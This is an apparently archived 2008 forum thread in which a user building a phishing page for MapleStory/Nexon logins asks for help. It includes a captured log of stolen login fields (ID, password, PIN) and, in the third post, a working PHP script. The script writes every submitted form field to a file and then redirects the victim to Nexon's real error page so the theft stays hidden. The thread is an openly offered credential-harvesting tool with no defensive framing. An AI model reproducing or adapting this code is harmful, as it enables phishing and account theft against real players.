Ezud.com Forum Home  
Ezud Home Ezud Forum  

Contact Us Members List Today's Posts
Go Back   Ezud.com - Trolling Assistance Forum > General Boards > General Stuff

Reply
 
Post New Thread Thread Tools Display Modes
  #1  
Old 10-13-2008, 03:33 PM
Sanjuro's Avatar
Sanjuro Sanjuro is offline
Ezudian
 
Join Date: Oct 2008
Location: Zimbabwe
Posts: 78
Reputation: 97
Sanjuro will become famous soon enough
Send a message via MSN to Sanjuro
Default Working on my Phisher, need help.

So I looked at Jared's Maplestory phishing log, and decided I want a phisher.

NEW ISSUE: I want it to come back in simpler terms then what is in the codebox below.

Link removed because its not needed no more.

That is what I have so far.
I don't really know how to write with .php.
So I need your help.

On the return of the log I get this.

Code:
#
__EVENTTARGET=
#
__EVENTARGUMENT=
#
__EVENTFUCK=
#
__VIEWSTATE=/wEPDwUKLTkyNDk3MTM1Mw9kFgICAg9kFgICAQ9kFgJmD2QWAgIDDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUXL01vZHVsZXMvTG9naW4kYnRuTG9naW4=
#
/Modules/Login$txtId=2222
#
/Modules/Login$btnLogin_x=23
#
/Modules/Login$btnLogin_y=24
#
/Modules/Login$txtPassword=2222
#
/Modules/Login$txtPin=2222
Yeah, it says EVENTFUCK=. That is where it reads the Pin.
Reply With Quote
  #2  
Old 10-13-2008, 05:48 PM
Lust's Avatar
Lust Lust is offline
Ex-Staff Member
 
Join Date: Jun 2008
Location: Russia
Posts: 1,143
Reputation: 1479
Lust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud ofLust has much to be proud of
Default

I have no idea what any of that means.

Post the logging file.
__________________

Reply With Quote
  #3  
Old 10-13-2008, 06:00 PM
Sanjuro's Avatar
Sanjuro Sanjuro is offline
Ezudian
 
Join Date: Oct 2008
Location: Zimbabwe
Posts: 78
Reputation: 97
Sanjuro will become famous soon enough
Send a message via MSN to Sanjuro
Default

Code:
<?php
header("location: http://www.nexon.net/errorPage.html");
$handle = fopen("filenamehere. :D", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
You mean that?
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Affiliates: Trik.com


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.